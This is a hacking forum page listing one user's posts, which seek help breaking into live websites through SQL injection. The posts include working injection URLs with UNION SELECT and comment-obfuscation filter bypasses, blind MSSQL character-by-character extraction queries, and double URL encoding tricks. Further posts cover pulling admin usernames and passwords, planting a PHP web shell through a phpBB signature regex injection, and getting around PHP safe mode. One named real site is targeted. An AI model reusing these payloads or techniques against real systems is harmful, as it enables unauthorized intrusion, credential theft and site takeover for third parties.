Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 51
1 year ago
the_storm
HelLo guys I would like to bypass this filter The word "order" I tried /*!order*/. Didnt work And different variations of capital and small letters but it didnt work ....any help with that ?bb
Forum: SQL and Code Injection
2 years ago
the_storm
Hello Gus I have some an application that is vulnerable to sql injecion ... For example, if that was the link http://www.test.com/audioalbumdetails/58+order+by+1/* I get this error msg SELECT id,name,content,time FROM nesote_music_comments WHERE status=1 and service_type='music' and service_id='58 order by 1' ORDER BY time desc LIMIT -5,5 ; MySQL Error: You have an error in your SQL s
Forum: SQL and Code Injection
2 years ago
the_storm
This maybe is one reason you might try another web browser, or maybe there is some filteration in the website against XSS attacks :)
Forum: SQL and Code Injection
2 years ago
the_storm
I dont think it is vulnerable to SQLi but you should try XSS!! I think it is vulnerable !
Forum: SQL and Code Injection
2 years ago
the_storm
Reiners Wrote: ------------------------------------------------------- > obviously the GET parameter "root" is split on > "_". > so "shared_0" becomes "WHERE file_root_type = > 'shared' AND file_root_ID = 0". > > if you put "and 1=2" the query may return nothing, > but the application can still decide to display >
Forum: SQL and Code Injection
2 years ago
the_storm
Hello guys, I have a sql injection in a website, but it is not completely working. Let's say this is the the url "http://site/script//viewfile.php?path=monument-valley/bus-stop-ahead.jpg&viewtype=image&root=shared_0" >> the site is working correctly If I add a single quote to the end of the url I get an error "http://127.0.1.1/b2evolution/blogs/htsrv/viewfile.php
Forum: SQL and Code Injection
2 years ago
the_storm
Hey guys I have a sql injection in a website but the combination between union+select is filtered. If i wrote select only I get reply If I wrote union only I get reply but If I wrote union+select I hot forbidden .. I have tried to bypass the filtration by using the comments /*!UNION*/ and I failed .. is there any other way to bypass this filtration ? Thank you!
Forum: SQL and Code Injection
2 years ago
the_storm
any help ??
Forum: SQL and Code Injection
2 years ago
the_storm
Hi guys, I have a SQL injection in a site and IT has 94 columns I want to read a specific range of the tables how can I do that ...?? I have tried to use limit x,y but it didn't work i.e http://www.site.com/index.php?option=com_library&id=-16%27+/*!UNION*/+select+1,2,/*!%28TABLE_NAME%29*/,4+/*!FROM*/+/*!INfoRMAtION_SCHEMA.TABLES*/+/*!Where*/+/*!TABLE_SCHEMA=database%28%29*/+limit%201,3-
Forum: SQL and Code Injection
3 years ago
the_storm
_antivirus_ Wrote: ------------------------------------------------------- > unhex(hex(password)) I have tried it but still the same problem
Forum: SQL and Code Injection
3 years ago
the_storm
Hey guys .. I have a website which has a SQL injection in it .. but when I try to get the username and password I can get the username put the field of the password is always empty .... and this can't be true .. There must be a password .. and the site doesn't give me any errors and When I used Havij (although I dont prefer using programs I love hands on ) I got this msg Turning on 'bypass illegal
Forum: SQL and Code Injection
3 years ago
the_storm
I use this method to get the column name http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000
Forum: SQL and Code Injection
3 years ago
the_storm
lightos Wrote: ------------------------------------------------------- > To concat in MSSQL simply use +, so fldUsername + > 0x3A + fldPassword and don't forget to URL Encode > the plus sign. Thank you dude it is working :) I have another question bro now look at this url http://www.site.com/shopping/page.asp?id=30 and (SELECT(fldAuto) from tbluser)>1 this gives me
Forum: SQL and Code Injection
3 years ago
the_storm
Hey guys .. there is a website that has a blind mssql .. I used this way to get the different tables http://www.site.com/page.asp?id=30 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name)FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 9 LOWER(name) FROM sysObjects WHERE xtYpe=0x55)) AS varchar(8000)),1,1)),0)>97 and I also get the columns name ... now I have th
Forum: SQL and Code Injection
3 years ago
the_storm
hi thanggiangho ..... could u explain the code why did u use 0xAAAA
Forum: SQL and Code Injection
3 years ago
the_storm
thanggiangho woow..... could u teach uw how did u do it .. ? ?
Forum: SQL and Code Injection
3 years ago
the_storm
I have tried the /*!Union*/+/*!SELECT*/ .. I have tried also the double encoding but still I cant bypass it...
Forum: SQL and Code Injection
3 years ago
the_storm
http://cleopatra-sy.com/index.php?content=more_product&id=17 here is the link ......... I have tried a lot to bypass it but I couldn't.... any help...?
Forum: SQL and Code Injection
3 years ago
the_storm
lightos what do u mean by "(double) URL encoding " I have searched the net for url encoder but when I encode my url it still contains the word select for example here is the normal url " /**//*!UNION*//**//*!SeLeCT*//**/1,2,3,4,5,6,7,8-- - the encoded one is "%2f**%2f%2f*!UNION*%2f%2f**%2f%2f*!SeLeCT*%2f%2f**%2f1%2c2%2c3%2c4%2c5%2c6%2c7%2c8--+-" if u notice that the wo
Forum: SQL and Code Injection
3 years ago
the_storm
Hi guys I have a website that forbids using the word Select in any from ... weather it is upper case or lower case... http://www.site.com/index.php?content=product_info&id=-35/**//*!UNION*//**//*!SeLeCT*//**/1,2,3,4,5,6,7,8--%20- I used this link and still I got error ... how can I bypass this filtration?? any ideas?
Forum: SQL and Code Injection
3 years ago
the_storm
m1cr0n you are awesome .... it works :) :) but I wanna understand what it means CONVERT(version() USING latin1) ??
Forum: SQL and Code Injection
3 years ago
the_storm
Hi guys :) ... how r u .. ? I hope you are okay .... Guys I do have a website in which there is a sql injection I tested the website by http://www.thesite.com/index.php?do=show_foundations.php&id=39' and the I got the columns http://www.thesite.com/index.php?do=show_foundations.php&id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11--%20- and I could see the number of the unhidden colum
Forum: SQL and Code Injection
3 years ago
the_storm
Reiners .. "I can execute php code" What do u mean by that? yes I can execute php, I can read files. I can't write files because when I write file_put_contents("shell.php", "phpshellcode"); the server gives me error that I can't use double or single quote. I can only read file bye this file_get_contents($_GET); so I avoid using quotes. here is php version PHP/5.3
Forum: SQL and Code Injection
3 years ago
the_storm
no I can't allow .php as extension and I can't allow layouts to allow php...
Forum: SQL and Code Injection
3 years ago
the_storm
Hey guys, I have a username and password of the admin in phpbb Froum. I googled about how to upload shell via phpbb control panel and I found the way that about restoring the database and update the profile here is the code. UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0' , user_sig='phpbb:cURL($_GET)' WHERE user_id=19770; I think most of u already know it. Now, the problem
Forum: SQL and Code Injection
3 years ago
the_storm
thank you Kyo Done :) and Thank you Reiners too :) Finally, Thank you Sla.ckers.org :)
Forum: SQL and Code Injection
3 years ago
the_storm
could u elaborate more bro..? what do u want exactly?
Forum: SQL and Code Injection
3 years ago
the_storm
Doesn't work dude, any way thank you Bro :)
Forum: SQL and Code Injection
3 years ago
the_storm
couldn't use it... Do u mind explain it a little ?
Forum: SQL and Code Injection
3 years ago
the_storm
check this out: Software: Microsoft-IIS/6.0. PHP/4.4.7 uname -a: Windows NT WINWEB04 5.2 build 3790 Safe-mode: ON (secure) My main goal is to get the safe mode of
Forum: SQL and Code Injection
Pages: 12Next
Current Page: 1 of 2